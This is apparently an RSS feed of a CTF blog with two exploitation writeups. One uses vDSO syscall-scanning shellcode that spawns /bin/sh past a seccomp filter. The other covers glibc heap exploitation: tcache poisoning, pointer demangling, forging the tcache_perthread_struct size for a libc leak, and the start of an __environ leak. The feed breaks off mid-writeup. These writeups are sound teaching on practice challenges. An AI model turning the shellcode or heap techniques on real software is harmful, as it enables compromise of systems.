<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet href="/rss.xsl" type="text/xsl"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Ub1k&apos;s Blog | Capture The Flag &amp; Vulnerability Research</title><description>Cybersecurity blog by David Hermes (Ub1k). In-depth binary exploitation, heap pwn, reverse engineering, and CTF writeups.</description><link>https://blog.davidherm.es</link><item><title>he_protecc: CornCTF 2025</title><link>https://blog.davidherm.es/posts/he_protecc</link><guid isPermaLink="true">https://blog.davidherm.es/posts/he_protecc</guid><description>Writeup of a shellcode executer challenge with seccomp filters.</description><pubDate>Fri, 20 Jun 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;he_protecc: CornCTF 2025&lt;/h2&gt;
&lt;p&gt;This is the first pwn challenge in the CornCTF 2025.&lt;/p&gt;
&lt;p&gt;Upon inspecting the binary we immediately notice two things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;The security mitigations are very relaxed&lt;/strong&gt;: the GOT is writable (Partial RELRO) and the code area is not position independent (No PIE) and as such is not randomized.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The ELF is statically linked&lt;/strong&gt;: so we can exclude ret2libc and we have to ignore shenanigans with dynamic libraries this time.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;images/he_protecc-018.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;By executing the binary we are prompted to input the length of some shellcode followed by the code itself.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/he_protecc-02.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;It would definitely be too easy if we could execute a &lt;code&gt;execve(&quot;/bin/sh&quot;,null,null)&lt;/code&gt; and get the shell.
Let&apos;s take a closer look at the binary to see what&apos;s really happening.&lt;/p&gt;
&lt;h2&gt;Looking around&lt;/h2&gt;
&lt;p&gt;Disassembling the binary reveals an easy to read and understand code, let&apos;s look at the most important stuff.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/he_protecc-013.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;mmap my beloved&lt;/h3&gt;
&lt;p&gt;:::note
&lt;strong&gt;mmap&lt;/strong&gt;() creates a new mapping in the virtual address space of the calling process. In other words, it creates a new data area in a position and with permissions decided by the caller, it is used in dynamically loaded binaries and in some cases in heap allocation.
In our case the program needs a mmap region because we don&apos;t have an area that is writable and executable at the same time.
:::&lt;/p&gt;
&lt;p&gt;The mmap call is easy to understand:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;New memory area is &lt;strong&gt;mapped&lt;/strong&gt; at position &lt;code&gt;0x500000&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;size&lt;/strong&gt; is &lt;code&gt;0x1000&lt;/code&gt; bytes (one page or 4096 bytes).&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;permission&lt;/strong&gt; parameter is &lt;code&gt;RWX&lt;/code&gt;: &lt;code&gt;001 | 010 | 100 = 111 (7)&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To understand the flags we can use the &lt;code&gt;strace&lt;/code&gt; command and read the instruction from there:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/he_protecc-012.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;These two flags simply signal that the mapped region is private to our process and not mapped to any file, this means the area is initialized with zeroes.&lt;/p&gt;
&lt;p&gt;A boring mmap region, nothing special here... sadly&lt;/p&gt;
&lt;h3&gt;seccomp&lt;/h3&gt;
&lt;p&gt;I&apos;m not going to show the full &lt;code&gt;setup_seccomp()&lt;/code&gt; disassembly as it is a bit ugly, the important part comes at the end:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/he_protecc-014.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;prctl&lt;/code&gt; call sets the &lt;strong&gt;NO_NEW_PRIVS&lt;/strong&gt; flag, why?  This is a security measure to stop privilege escalation made by malformed seccomp filter, so we put it before every seccomp installation (&lt;a href=&quot;https://unix.stackexchange.com/questions/562260/why-we-need-to-set-no-new-privs-while-before-calling-seccomp-mode-filter&quot;&gt;explanation&lt;/a&gt;).
The next instruction, the syscall, installs a seccomp filter on the binary.&lt;/p&gt;
&lt;p&gt;:::note
As the name suggests, seccomp is a mechanism to harden syscall access by evaluating a small program called a Berkeley Packet Filter (BPF) for every syscall. Based on the result, the syscall is either allowed or denied.
:::&lt;/p&gt;
&lt;p&gt;So the questions becomes: What does this seccomp filter allow?
I was today years old when I learned that I don&apos;t need to manually decode seccomp filters... there exists a tool for that, thanks Marco. (&lt;a href=&quot;https://github.com/david942j/seccomp-tools&quot;&gt;Github&lt;/a&gt;):&lt;/p&gt;
&lt;p&gt;So by executing &lt;code&gt;seccomp-tools dump ./protected&lt;/code&gt; we get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; line  CODE  JT   JF     K
=================================
 0000: 0x20 0x00 0x00 0x00000008  A = instruction_pointer
 0001: 0x01 0x00 0x00 0x003fffff  X = 4194303 (0x3fffff)
 0002: 0x2d 0x00 0x0a 0x00000000  if (A &amp;lt;= X) goto 0013
 0003: 0x01 0x00 0x00 0x004b7fff  X = 4947967 (0x4b7fff)
 0004: 0x2d 0x00 0x07 0x00000000  if (A &amp;lt;= X) goto 0012
 0005: 0x01 0x00 0x00 0x004fffff  X = 5242879 (0x4fffff)
 0006: 0x2d 0x00 0x06 0x00000000  if (A &amp;lt;= X) goto 0013
 0007: 0x01 0x00 0x00 0x00500fff  X = 5246975 (0x500fff)
 0008: 0x2d 0x00 0x03 0x00000000  if (A &amp;lt;= X) goto 0012
 0009: 0x20 0x00 0x00 0x0000000c  A = instruction_pointer &amp;gt;&amp;gt; 32
 0010: 0x01 0x00 0x00 0x00007fff  X = 32767 (0x7fff)
 0011: 0x2d 0x00 0x01 0x00000000  if (A &amp;lt;= X) goto 0013
 0012: 0x06 0x00 0x00 0x80000000  return KILL_PROCESS
 0013: 0x06 0x00 0x00 0x7fff0000  return ALLOW
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is &lt;em&gt;not&lt;/em&gt; a typical seccomp filter. Normally a seccomp filter checks the syscall number against a whitelist and returns if it is permitted or not, but here the filter loads the &lt;code&gt;RIP&lt;/code&gt; at the moment of execution of the syscall and only returns ALLOW if the position is one of the following, else the process gets killed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Before &lt;code&gt;0x3FFFFF&lt;/code&gt;: but that&apos;s not possible because the address space starts at &lt;code&gt;0x400000&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Between &lt;code&gt;0x4b7fff&lt;/code&gt; and &lt;code&gt;0x4fffff&lt;/code&gt;: but there are no syscalls in that region.&lt;/li&gt;
&lt;li&gt;Between &lt;code&gt;0x500fff&lt;/code&gt; and &lt;code&gt;0x7fffffffffff&lt;/code&gt;:  After the mmap regio, so this is why we can&apos;t execute a syscall in the shellcode :(&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;But WAIT, what can we find after &lt;code&gt;0x500fff&lt;/code&gt; but before &lt;code&gt;0x7fffffffffff&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;Let&apos;s run our debugger of choice and look at the mappings:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/he_protecc-015.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Using &lt;code&gt;vmmap&lt;/code&gt; we can see that only one mapping has read and execution permission, and that is &lt;code&gt;vdso&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;:::note
&lt;strong&gt;vDSO&lt;/strong&gt; (virtual dynamic shared object) is a kernel mechanism for exporting a carefully selected set of kernel space routines to user space applications so that applications can call these kernel space routines in-process, without incurring the performance penalty of a mode switch from user mode to kernel mode. (&lt;a href=&quot;https://en.wikipedia.org/wiki/VDSO&quot;&gt;Wikipedia&lt;/a&gt;)
:::&lt;/p&gt;
&lt;p&gt;By piping the instructions found in that memory area into &lt;code&gt;grep&lt;/code&gt; we can see a few syscall instruction inside &lt;code&gt;vdso&lt;/code&gt;, jumping to them should give us the syscall we need!&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/he_protecc-016.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Leak &amp;amp; Pwn&lt;/h2&gt;
&lt;p&gt;Here comes the problem, even if the ELF is not PIE, the stack and also &lt;code&gt;vdso&lt;/code&gt; still get randomized by &lt;strong&gt;ASLR&lt;/strong&gt;, even worse, the internal offsets also get randomized... But let&apos;s tackle one problem after another:&lt;/p&gt;
&lt;h3&gt;The Leak&lt;/h3&gt;
&lt;p&gt;Using &lt;code&gt;p2p stack vdso&lt;/code&gt; we can see 4 leaks on the stack for &lt;strong&gt;vdso&lt;/strong&gt;, let&apos;s choose the first one.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/he_protecc-017.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Assembly&lt;/h3&gt;
&lt;p&gt;Now comes the &lt;em&gt;difficult&lt;/em&gt; part, we can&apos;t calculate the offset between the syscalls and our leak because we cannot guarantee that the internal offsets are the same in the remote binary, we need to scan the memory area...&lt;/p&gt;
&lt;p&gt;The first part is easy, let&apos;s take the first leak and put it into a register:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;mov r8, [rbp - 0x218]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We could zero out the 12 least significant bits of this leak to align the address to the start of a memory page, but in our case, it&apos;s unnecessary, we already know there are 5 syscall instructions diseminated in the region and it is impossible that they are all contained in the first &lt;code&gt;0x340&lt;/code&gt; bits of the page.
Now let&apos;s scan the memory region for a syscall instruction, remember that it&apos;s opcode is &lt;code&gt;0x0F05&lt;/code&gt; but we are in little-endian so we need to reverse the order of bits:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;loop:
inc r8
mov ax, word ptr [r8]
cmp ax, 0x050f // &amp;lt;-- syscall opcode but reversed
jne loop
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code snipped increases &lt;code&gt;r8&lt;/code&gt; (pointer to &lt;code&gt;vdso&lt;/code&gt; leak) and reads two bytes, it then checks if the bytes are equal to the one representing syscall, if not, it continues the loop. If it exits instead, &lt;code&gt;r8&lt;/code&gt; will point to a valid syscall instruction, and we can continue with setting the other registers for an execve call.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;mov r9, {u64(b&quot;/bin/sh\0&quot;)}
push r9

mov rax, 59 
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx

jmp r8 // &amp;lt;-- jump to syscall outside our mmap area
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;sending this payload will spawn a shell and with a simple &lt;code&gt;cat flag.txt&lt;/code&gt; we get the flag!&lt;/p&gt;
</content:encoded><author>David Hermes</author></item><item><title>Babyheap: JustCTF - Chapter 1</title><link>https://blog.davidherm.es/posts/babyheap</link><guid isPermaLink="true">https://blog.davidherm.es/posts/babyheap</guid><description>Writeup of a Heap Exploitation challenge with environ leak.</description><pubDate>Mon, 20 Oct 2025 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Normally, especially for beginners, seeing a baby challenge is always a very refreshing alternative to the high level tasks made to challenge also the best of players.&lt;/p&gt;
&lt;p&gt;You solve a very simple challenge and have the possibility to encounter a new technique in a simple and protected setting. Baby heap breaks one of these assumptions, to be fair, it was never written which type of &lt;em&gt;baby&lt;/em&gt; is intended in the title, a newborn beluga whale for example can weight even $100$kg, enough to crush my sanity.&lt;/p&gt;
&lt;p&gt;By the end of this write-up, I hope you’ll understand both my frustration and my realization: maybe my assumptions about baby challenges were wrong from the start. In fact, I learned more about &lt;code&gt;libc&lt;/code&gt; internals and exploitation techniques in this single challenge than in all the other “baby” ones combined.&lt;/p&gt;
&lt;p&gt;This is a two-part journey: from simple heap exploitation to advanced techniques, and finally, as dessert, an &lt;code&gt;exit_function&lt;/code&gt; overwrite and &lt;code&gt;environ&lt;/code&gt; leak.&lt;/p&gt;
&lt;h2&gt;The disassembly&lt;/h2&gt;
&lt;p&gt;As usual, we are not going to look at the entire binary, but instead focusing on the relevant parts. For context, the program is straightforward:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;create_chunk()&lt;/code&gt; Allocates a buffer of size &lt;code&gt;0x30&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;modify_chunk()&lt;/code&gt; Allows you to overwrite the contents of an existing chunk.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;read_chunk()&lt;/code&gt; Reads the full &lt;code&gt;0x30&lt;/code&gt; bytes from a chunk.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;delete_chunk()&lt;/code&gt; Frees the chunk.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We are gonna concentrate on two of these functions:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//babyheap
int create_chunk()
{
  int index; // [rsp+Ch] [rbp-4h]

  index = get_index();
  if ( *((_QWORD *)&amp;amp;chunks + index) )
	return puts(&quot;This index is already in use&quot;);
  *((_QWORD *)&amp;amp;chunks + index) = malloc(0x30uLL);
  printf(&quot;Content? &quot;);
  printf(&quot;Content? &quot;); //wtf why?
  return read(0, *((void **)&amp;amp;chunks + index), 0x30uLL);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As described above, this function creates a chunk and saves the address to an array of max $20$ entries, if the entry is occupied it returns without allocating and gives an error message.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//babyheap
void delete_chunk()
{
  int index; // [rsp+Ch] [rbp-4h]

  index = get_index();
  if ( *((_QWORD *)&amp;amp;chunks + index) )
    free(*((void **)&amp;amp;chunks + index));
  else
    puts(&quot;This chunk is empty&quot;);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Looking at the &lt;code&gt;delete_chunk()&lt;/code&gt;function we notice that it doesn&apos;t remove the address from the array once deleted. This has a few implications, &lt;em&gt;first&lt;/em&gt; it is possible to read and write to a freed chunk, and &lt;em&gt;second&lt;/em&gt;, once created a chunk you cannot call a second time &lt;code&gt;create_chunk()&lt;/code&gt; on the same index, this limits our &lt;code&gt;create_chunk()&lt;/code&gt; calls to maximum 20.&lt;/p&gt;
&lt;h2&gt;Heap Exploitation&lt;/h2&gt;
&lt;p&gt;:::warning
&lt;strong&gt;Heap exploitation&lt;/strong&gt; is a complex topic, so I won’t go too deep here. If you are interested here is a link to some &lt;a href=&quot;https://5o1z.github.io/blog/heapexploitation/getting_started/&quot;&gt;material&lt;/a&gt;.
:::&lt;/p&gt;
&lt;p&gt;When &lt;code&gt;malloc()&lt;/code&gt; is called, generally, a memory address to the heap is returned, this address points to the user data of a struct, the sections above contain important metadata. We like to call this memory areas chunks.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-002.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;From now one we will consider the header part of the chunk, so it’s size becomes 0x40 instead of 0x30.&lt;/strong&gt;
Looking at the chunks header, we notice a few significant fields: The size field stores the amount of bytes that divide this chunk from the next one, yet nothing stops us from writing more bytes than the amount specified in the size field.
Another interesting part is the P flag, if &lt;code&gt;prev_used&lt;/code&gt; is set, free() knows that the previous chunk is currently allocated, if the flag isn&apos;t set, the allocator could try to fuse together the two chunks to create a bigger one.&lt;/p&gt;
&lt;h3&gt;The bins&lt;/h3&gt;
&lt;p&gt;When a chunk is freed, from &lt;code&gt;LIBC-2.26&lt;/code&gt; onwards the deallocator first tries to place an address pointing to the user data as the first element of a per-size-class singly linked list called the &lt;strong&gt;tcache&lt;/strong&gt;, which can hold up to 7 elements in every class of max 0x410 bytes of size.&lt;/p&gt;
&lt;p&gt;In the free operation, the first 0x10 bytes of the user data are overwritten with a pointer to the next chunk in the list (fd) and a random value called tcache key used to prevent double frees (not to be confused with the tcache &lt;strong&gt;mangling&lt;/strong&gt; key explained later in this chapter). This means that when a freed chunk is read, you won&apos;t read the content it stored before but a pointer to a previously freed chunk or, if this is the first freed chunk, a null pointer.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-003.webp&quot; alt=&quot;|470x182&quot; /&gt;&lt;/p&gt;
&lt;p&gt;If more than 7 chunks of the same size are freed, and the chunk is between &lt;code&gt;0x20&lt;/code&gt; and &lt;code&gt;0x80&lt;/code&gt; bytes long, the allocator adds them into the &lt;strong&gt;fastbin&lt;/strong&gt;. Fastbins have no limit on the number of chunks they can store, but are limited by the before mentioned size classes, also the fd pointer doesn&apos;t point to the next fd pointer but to the prev_size field.&lt;/p&gt;
&lt;p&gt;If the tcache is full and the elements are not compatible with the fastbin size-classes, or in very specific cases when mechanisms trigger &lt;em&gt;fastbin consolidation&lt;/em&gt; (foreshadowing), chunks are placed into the &lt;strong&gt;unsortedbin&lt;/strong&gt;. From there they can get sorted into &lt;strong&gt;largebins&lt;/strong&gt; or &lt;strong&gt;smallbins&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;This last three bins are implemented as doubly-linked circular lists. These have their head stored in the &lt;strong&gt;libc address space&lt;/strong&gt;, to be more precise, in the &lt;code&gt;main_arena&lt;/code&gt;, and because of the circular nature of these lists, the &lt;strong&gt;last&lt;/strong&gt; element has a forward (fd) pointer to the head of the list stored in the arena, also because of the double-link, the &lt;strong&gt;first&lt;/strong&gt; element has a backwards pointer (bk) to it too. So by reading a freed chunk in these bins you can receive a libc leak.&lt;/p&gt;
&lt;h3&gt;tcache poisoning&lt;/h3&gt;
&lt;p&gt;If this binary had &lt;strong&gt;Partial RELRO&lt;/strong&gt; and was &lt;strong&gt;non-PIE&lt;/strong&gt;, we could have allocated two chunks and then freed them.&lt;br /&gt;
Once freed, both chunks would be placed into the &lt;code&gt;tcache&lt;/code&gt; linked list, and where their data once resides, pointers to the next chunk in the linked list would now be written. By modifying the last freed chunk’s forward pointer (first element in the tcache list) to point to something like the GOT, the allocator would think that the first deallocated chunk (second element in the tcache) is stored in the GOT table.&lt;/p&gt;
&lt;p&gt;:::warning
From &lt;code&gt;LIBC-2.32&lt;/code&gt; The forward pointer (&lt;code&gt;fd&lt;/code&gt;) addresses saved in the freed tcache entries are &lt;strong&gt;encoded&lt;/strong&gt; (mangled).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//libc internals
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) &amp;gt;&amp;gt; 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&amp;amp;ptr, ptr)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The macro takes as input the position where the pointer is saved and the location where the pointer is pointing too.&lt;/p&gt;
&lt;p&gt;It then shifts away the 12 least significant bits of the position value, a memory page is generaly 0x1000 (16 bits) long, so we are removing the information about page internal positioning, leaving only the &lt;strong&gt;page address&lt;/strong&gt;. In other words two chunks in the same page will have the same &lt;code&gt;((size_t) pos) &amp;gt;&amp;gt; 12)&lt;/code&gt; value.
It then xores this value with the pointer to mangle it.&lt;/p&gt;
&lt;p&gt;This ensures that the &lt;em&gt;encoded value depends both on the pointer and on the page where it is stored&lt;/em&gt;. Pointers stored in different pages will be mangled differently, even if they point to the same target.&lt;/p&gt;
&lt;p&gt;By doing the same operatin again we can reveal the pointer.&lt;/p&gt;
&lt;p&gt;But this encoding is easily reversed, the page address used for mangling is part of the address itself, so this algorithm could be defined as a deterministic scramble. Xoring the mangled pointer with shifted parts of itself completly decodes the pointer.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def demangle_alone(ptr,page_offset=0):
	mid = ptr ^ ((ptr&amp;gt;&amp;gt;12)+page_offset)
  	return mid ^ (mid&amp;gt;&amp;gt;24)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;:::
Then, by reallocating the two chunks, the allocator would return the address of the GOT as the second allocation (the first 16 bytes get zeroed out, look at the note below), we could then:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Read&lt;/strong&gt; from the GOT by reading from the second chunk to leak a libc address, but this only works with ‘fwrite()’ or similar because the first 0x10 bytes are null pointers terminating ‘printf’ or ‘puts’ instantly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Overwrite&lt;/strong&gt; a GOT entry (&lt;code&gt;free&lt;/code&gt;) with the address of &lt;code&gt;system()&lt;/code&gt;, giving us a shell the next time that function is called.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;:::note
From &lt;code&gt;LIBC-2.29&lt;/code&gt; after the 8 byte fd pointer saved in the chunk, another 8 bytes get used to store the &lt;strong&gt;tcache key&lt;/strong&gt;, these &lt;strong&gt;16 bytes get zeroed out&lt;/strong&gt; when a chunk gets allocated. If this tcache key is present when a free operation is done, that tcache bin gets checked for a double free, else no check is done.
:::
But that’s not the case here… behold:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-006.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Still, this very simple technique called &lt;strong&gt;tcache poisoning&lt;/strong&gt; will prove useful several times throughout this writeup.&lt;/p&gt;
&lt;p&gt;But let’s exit this hypothetical scenario and focus on the real limitations we face: the binary has &lt;strong&gt;no apparent address leak&lt;/strong&gt; and &lt;strong&gt;no buffer overflow&lt;/strong&gt;, we need to take control in some other way.&lt;/p&gt;
&lt;h2&gt;The Plan&lt;/h2&gt;
&lt;p&gt;Our actual goal is to gain &lt;strong&gt;arbitrary read and write primitives within libc&lt;/strong&gt;. With these, we can leak crucial pointers like &lt;code&gt;__envrion&lt;/code&gt;, &lt;code&gt;__exit_functions&lt;/code&gt; or other stuff, and eventually get to a shell.
At this point, it’s worth clarifying that I didn’t solve this challenge during the competition itself. Instead, I studied various writeups to deeply understand the possible solutions and their underlying mechanics.&lt;/p&gt;
&lt;p&gt;I’ll present &lt;strong&gt;two&lt;/strong&gt; methods to leak a libc pointer, followed by &lt;strong&gt;two&lt;/strong&gt; techniques to leverage that leak to achieve a shell. The first leak and exploit can be found in this part, the second part includes a more exotic variant.&lt;/p&gt;
&lt;h2&gt;House of something&lt;/h2&gt;
&lt;p&gt;As explained in the heap primer, the heads of the linked lists for &lt;code&gt;smallbin&lt;/code&gt;, &lt;code&gt;largebin&lt;/code&gt;, and &lt;code&gt;unsortedbin&lt;/code&gt; live in &lt;code&gt;main_arena&lt;/code&gt; inside libc. Those lists are doubly linked and circular. If we can move a chunk into one of those bins we can read the &lt;code&gt;fd&lt;/code&gt; pointer that points back into libc and obtain a libc leak usable later.&lt;/p&gt;
&lt;p&gt;Sending a chunk into those bins requires freeing a large enough chunk. The tcache holds chunks up to size &lt;code&gt;0x410&lt;/code&gt; (inclusive), so we must either create a single chunk larger than &lt;code&gt;0x410&lt;/code&gt; or free more than seven smaller chunks while avoiding the fastbin path (above 0x80 bytes), we will try to deallocate a 0x410 or greater size chunk.&lt;/p&gt;
&lt;h3&gt;Reasoning about chunks&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Question&lt;/strong&gt;: By manipulating a chunk’s fd pointer (tcache poisoning) to position the next chunk in the tcache list just above a previously allocated third chunk, is it possible to use the first chunk to alter the size metadata of the second chunk, so that when the third chunk is freed, the allocator interprets its size as 0x420 bytes and moves the chunk into unsortedbin?&lt;/p&gt;
&lt;p&gt;In theory, &lt;strong&gt;yes&lt;/strong&gt;, but with important caveats. We must have a second chunk immediately after our forged chunk (including it&apos;s modified size), in this way when we free the giant chunk it doesn&apos;t get trimmed away.&lt;br /&gt;
Targeting a 0x420 size will cross past the current top chunk, so we need to allocate enough intermediate chunks until our &lt;em&gt;guard chunk&lt;/em&gt; (the second chunk mentioned before) sits directly after our forged chunk. Only then can freeing the forged chunk make the allocator interpret a 0x420 size and move the chunk to unsortedbin instead of trimming it away, producing the desired libc leak.&lt;/p&gt;
&lt;p&gt;To guarantee that an extra chunk is placed immediately behind our forged &lt;code&gt;0x420&lt;/code&gt; chunk we expand the forged size slightly to &lt;code&gt;0x440&lt;/code&gt;. Because small chunks are &lt;code&gt;0x40&lt;/code&gt; bytes, the &lt;code&gt;0x440&lt;/code&gt; size ensures the forged chunk completely overlaps the final small chunk in that region.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-001-3.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;But it&apos;s not so simple, with 19 allocations we don&apos;t have enough chunks to push the top chunk behind our forged one and also have enough allocations to do some tcache poisoning for our final exploitation. We need another strategy.&lt;/p&gt;
&lt;h3&gt;tcache_perthread_struct&lt;/h3&gt;
&lt;p&gt;The Tcache has a significant property that the other bins don&apos;t have, it is local to a specific thread, if more threads are present in the process, more tcaches are created. To make this work, for every thread a tcache struct called &lt;code&gt;tcache_perthread_struct&lt;/code&gt; is allocated that contains the heads of the linked lists and the number of freed chunks. For our primary thread the 0x290 bytes long perthread_struct is allocated at the top.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42/source/malloc/malloc.c#L3127
typedef struct tcache_perthread_struct
{
  uint16_t num_slots[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;By using the &lt;code&gt;heap&lt;/code&gt; command in pwndbg we can spot the perthread chunk (first one), the second one is a 0x40 chunk created through the menu of the program and the last on is the topchunk:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-001-4.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;So, could we use this chunk as our forged chunk?&lt;/strong&gt;&lt;br /&gt;
Yes. Even though we never directly allocated this chunk and thus did not receive its pointer, we can still allocate a new chunk that completely overlaps the first 0x40 bytes of the &lt;code&gt;perthread_struct&lt;/code&gt;. From there, we can modify its size field using a slightly overlapping chunk, just like the technique described earlier. By adding new chunks the allocator will place them after the 0x290 perthread_chunk like in the image above.&lt;/p&gt;
&lt;p&gt;This approach significantly reduces the number of required allocations to correctly position the guard chunk, from 16 allocations (excluding the guard and the two overlapping chunks) down to just 6.&lt;/p&gt;
&lt;p&gt;The main drawback is that the &lt;code&gt;perthread_struct&lt;/code&gt; becomes corrupted, breaking the tcache metadata, in particular the amount of stored chunks saved at the beginning of the struct get zeroed out by the allocation and filed with values at the deallocation. Nevertheless, this appears to be our only viable option for obtaining a chunk large enough for the intended purpose.&lt;/p&gt;
&lt;h3&gt;You are 0x440 bytes big, trust me&lt;/h3&gt;
&lt;p&gt;Talk is cheap, so let’s move to the practical part.&lt;br /&gt;
We’ll use &lt;strong&gt;tcache poisoning&lt;/strong&gt; to place a chunk precisely at the location of the &lt;code&gt;perthread_chunk&lt;/code&gt; the deallocator will mistake the perthread_chunks size as the one of our own chunks. Then, we allocate a second chunk and poison the tcache again so that it partially overlaps the &lt;code&gt;perthread&lt;/code&gt;/fake-chunk metadata. This overlapping chunk gives us write access to the &lt;code&gt;perthread&lt;/code&gt; metadata, allowing us to modify its size field from &lt;code&gt;0x290&lt;/code&gt; to &lt;code&gt;0x440&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Next, we allocate enough chunks to push the &lt;code&gt;top&lt;/code&gt; chunk downward, six allocations plus the guard chunk.&lt;br /&gt;
By looking at the addresses of the chunks in the image below we can notice the modified &lt;code&gt;perthread&lt;/code&gt; chunk with the guard chunk right beneath it.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-002-1.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Finally, we free the chunk placed over the &lt;code&gt;perthread&lt;/code&gt; structure, the deallocator will check the size and moves the pointer to the &lt;strong&gt;unsorted bin&lt;/strong&gt;. During this process, the unsorted bin writes &lt;code&gt;fd&lt;/code&gt; (forward) and &lt;code&gt;bk&lt;/code&gt; (backward) pointers into the freed chunk; these pointers reference &lt;code&gt;main_arena&lt;/code&gt;. Reading from the freed chunk’s user area thus reveals a &lt;strong&gt;libc pointer leak&lt;/strong&gt;!.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-003-1.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;ROP exploit using &lt;code&gt;__environ&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;Once we have arbitrary read and write into the libc getting a leak to the stack is very simple, enter &lt;code&gt;__environ&lt;/code&gt;.&lt;/p&gt;
&lt;h4&gt;The __environ variable&lt;/h4&gt;
&lt;p&gt;:::note
Yes, here&apos;s a joke about &lt;code&gt;__environ&lt;/code&gt;:
&lt;code&gt;__environ&lt;/code&gt; goes to therapy. Talks nonstop for hours.
Then it asks, “Why always me?”&lt;br /&gt;
Therapist responds, “It all comes from your environment.”
:::
&lt;code&gt;__environ&lt;/code&gt; is a global variable pointing to the environment variables saved on the stack:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;environ = libc_base + libc.symbols.__environ
&lt;/code&gt;&lt;/pre&gt;
&lt;h4&gt;The ROP chain&lt;/h4&gt;
&lt;p&gt;We can use &lt;strong&gt;tcache poisoning&lt;/strong&gt; to overwrite the &lt;code&gt;fd&lt;/code&gt; pointer of the first freed chunk with the address of &lt;code&gt;__environ&lt;/code&gt;. After allocating twice, the second allocation will return a chunk overlapping the &lt;code&gt;__environ&lt;/code&gt; pointer.&lt;/p&gt;
